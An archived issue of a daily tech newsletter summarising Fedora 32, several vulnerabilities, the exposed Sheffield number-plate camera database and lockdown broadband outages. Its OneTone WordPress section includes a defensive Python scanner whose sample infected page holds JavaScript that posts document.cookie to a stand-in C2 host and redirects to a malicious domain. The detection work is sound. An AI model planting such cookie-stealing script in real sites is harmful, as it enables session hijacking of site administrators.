FOXTROT/ALFA: Fedora 32, Sheffield License Plate Camera Database Wide Open, Internet Outages

Welcome to issue 110 of FOXTROT/ALFA! I’m a bit sleep deprived due to working pretty much 24/7, but I won’t let you start your day without the previous day’s tech news in your inbox. So here’s what’s happened on Tuesday, 28 April 2020.

Fedora 32 is Out

Fedora 32 has been released. It’s not exactly full of headline features…

Following our “First” foundation, we’ve updated key programming language and system library packages, including GCC 10, Ruby 2.7, and Python 3.8. Of course, with Python 2 past end-of-life, we’ve removed most Python 2 packages from Fedora. A legacy python27 package is provided for developers and users who still need it. In Fedora Workstation, we’ve enabled the EarlyOOM service by default to improve the user experience in low-memory situations.

Maybe a good upgrade if you’re a neuroscientist.

New in Fedora 32 is the Comp Neuro Lab, developed by our Neuroscience Special Interest Group to enable computational neuroscience.

Vulnerabilities and Data Breaches

Sophos has fixed a security vulnerability in its XG Firewall which could be exploited to gain access to sensitive data, and which could then possibly be leveraged for remote code execution.

This is a new pre-auth SQL injection vulnerability (CVE-2020-12271) designed to exfiltrate XG Firewall-resident data, including all local usernames and hashed passwords of any local user accounts, including local device admin accounts, user portal accounts, and accounts used for remote access. Passwords associated with external authentication systems such as Active Directory (AD) or LDAP are not directly at risk from this vulnerability. The attack can be performed against both user-facing and administrator-facing exposed services on the firewall.

In other news, Microsoft Teams accounts could be hacked with a malicious GIF.

An attacker sends a GIF or an image to a victim and gets control over their account. This vulnerability worked just that way and had the potential to take over an organization’s entire roster of Microsoft Teams accounts.

You did have to get a GIF into their internal chat, though. And you needed to exploit a DNS misconfiguration to get access to a subdomain under teams.microsoft.com first.

If you are running a really old WordPress theme called OneTone, you will want to get rid of that ASAP.

This theme vulnerability allows attackers to only inject HTML to certain places on the web page. To improve their chances of maintaining unauthorized access to the site, attackers use this vulnerability to inject Javascript through HTML’s <script> tags and hijack authenticated administrator sessions. When successful, the hijacked session can then be used to create a malicious admin user that exists as a backdoor to the infected website. This maliciously created admin user can also be used to add additional backdoors like PHP shells through the WordPress dashboard.

Planting a variety of backdoors ensures the success of the campaign — in the event that the vulnerability is patched or the JavaScript injection is removed, the attackers will still be able to access the compromised environment. Finally, all of the website and created user information is sent to a C2 server where the attacker can automate the collection of the new admin users from across many infected websites.

Since most website visitors will not be logged in as a wp-admin user, the last part of the malicious JavaScript is used to redirect those visitors elsewhere. It accomplishes this by checking if the value of the ppkcookie cookie equals un – if it doesn’t, the visitor is instead sent to the malicious redirector ischeck[.]xyz.
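The indicators in Sucuri’s description (the gate on the ppkcookie cookie, the ischeck[.]xyz redirector, and a script that reads document.cookie and ships it to a third-party host) are easy to check for in your own site’s HTML. The scanner below is an added example written for this issue, not code from Sucuri or from the OneTone theme; the two pages it scans are constructed samples, and the site host blog.example.org and the C2 host evil-c2.example are assumptions.

```python
"""Scan a page's inline <script> elements for the OneTone-campaign indicators
described in the Sucuri write-up. Added example; the HTML below is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

COOKIE_NAME = "ppkcookie"        # cookie the injected script gates on
REDIRECT_DOMAIN = "ischeck.xyz"  # redirector non-admin visitors are sent to
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


class _InlineScripts(HTMLParser):
    """Collects the body of every inline <script> element; src= scripts are skipped."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script" and "src" not in dict(attrs):
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def scan_html(html, site_host):
    """Scan one page; return (indicator, detail) tuples, empty if nothing matched."""
    parser = _InlineScripts()
    parser.feed(html)
    parser.close()
    findings = []
    for body in parser.scripts:
        reads_cookie = "document.cookie" in body
        if reads_cookie and COOKIE_NAME in body:
            findings.append(("cookie-gate", COOKIE_NAME))
        for url in URL_RE.findall(body):
            host = (urlparse(url).hostname or "").lower()
            if host == REDIRECT_DOMAIN or host.endswith("." + REDIRECT_DOMAIN):
                findings.append(("redirector", host))
            elif reads_cookie and host != site_host:
                # A script that reads cookies and talks to some other host is the
                # session-hijack / C2 pattern, whatever the domain is called.
                findings.append(("cookie-exfil", host))
    return findings


# Assumed site host and constructed sample pages (not captured from a real site).
SITE_HOST = "blog.example.org"

CLEAN_PAGE = """<html><body>
<script>document.cookie = "theme=dark; path=/";</script>
<script src="https://blog.example.org/wp-includes/js/jquery.js"></script>
<p>Nothing to see here.</p>
</body></html>"""

INFECTED_PAGE = """<html><body>
<script>
if (document.cookie.indexOf("ppkcookie=un") === -1) {
  window.location.href = "http://ischeck.xyz/";
}
</script>
<script>
var r = new XMLHttpRequest();
r.open("POST", "http://evil-c2.example/collect");
r.send(document.cookie);
</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_html(page, SITE_HOST))
```

The cookie-exfil rule deliberately does not depend on the ischeck[.]xyz name: once the redirector domain changes, a script that reads document.cookie and posts to anything but your own host is still the thing to hunt for. Run it over the HTML your server actually sends to an anonymous visitor, not the theme files on disk, because the injection lives in the rendered page.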

TIL: Sucuri is owned by GoDaddy. I had no idea.

The database behind Sheffield’s automatic number-plate recognition cameras was sitting wide open on the internet. Colour me surprised.

In a blunder described as “astonishing and worrying,” Sheffield City Council’s automatic number-plate recognition (ANPR) system exposed to the internet 8.6 million records of road journeys made by thousands of people. The ANPR camera system’s internal management dashboard could be accessed by simply entering its IP address into a web browser. No login details or authentication of any sort was needed to view and search the live system – which logs where and when vehicles, identified by their number plates, travel through Sheffield’s road network.

Does anybody still think these things are a good idea?

Outages, Outages Everywhere

Our internet infrastructure is obviously struggling to hold up to sustained use under the global lockdown.

Broadband outages have soared since the start of the COVID-19 lockdown, per data from US network intelligence firm ThousandEyes. Among the most recent victims is Virgin Media, which suffered intermittent failures across the UK and Ireland starting yesterday early evening, and continuing into the early hours of the morning.

ThousandEyes has pointed the finger at the UPC AS6830 Broadband network, which is owned by Virgin Media’s parent company, Liberty Global. Acquired in 2015, this network operates many peering arrangements with CDN providers, as well as other networks like Level 3 and Akamai.

This is of course not due to sustained usage. Of course not!

An update posted by Virgin to the outage section of its website stated the issue was “not caused by a spike in usage or a lack of network capacity”. The firm has since attributed the issue to a fault in the core network, but has yet to provide technical details.

The timing couldn’t be worse. Due to the ongoing lockdown, more people than ever are banking on reliable internet access to work and stay entertained.

Similar scenes are playing out here in Germany, where Vodafone’s cable network was struck by outages. The company blamed “a software problem” on “a server” for the downtime. It says the problem is fixed, but the trouble is still persisting.

I’m thinking this is because all these clowns never reckoned with their stuff actually being used at capacity. When people actually start to use it a lot, it all fails, because all these companies are cutting corners everywhere to save costs. And obviously they never saw it coming that the whole world would work from home for a few months.

US Senator Wants Criminal Antitrust Probe of Amazon

Take a guess… Does this sound like something a Democrat or a Republican would do? Surprise! It’s a Republican!

Amazon is already facing a bevy of antitrust probes, both in the United States and overseas. Just about every state, federal, and international regulator with any kind of competition regulation power is investigating the company over some aspect of its business. Sen. Josh Hawley (R-Mo.), however, wants to add one more to the pile and is calling on the Justice Department to launch a criminal probe.

“Recent reports suggest that Amazon has engaged in predatory and exclusionary data practices to build and maintain a monopoly,” Hawley wrote today in a letter to Attorney General William Barr. “These practices are alarming for America’s small businesses under ordinary circumstances. But at a time when most small retail businesses must rely on Amazon because of coronavirus-related shutdowns, predatory data practices threaten these businesses' very existence.”

I’ll be watching that one with great interest!

Also Noteworthy

A number of other stories I also read today:


This is an archived issue of my daily newsletter FOXTROT/ALFA. You can find more information about it, including how to subscribe via email, on this page.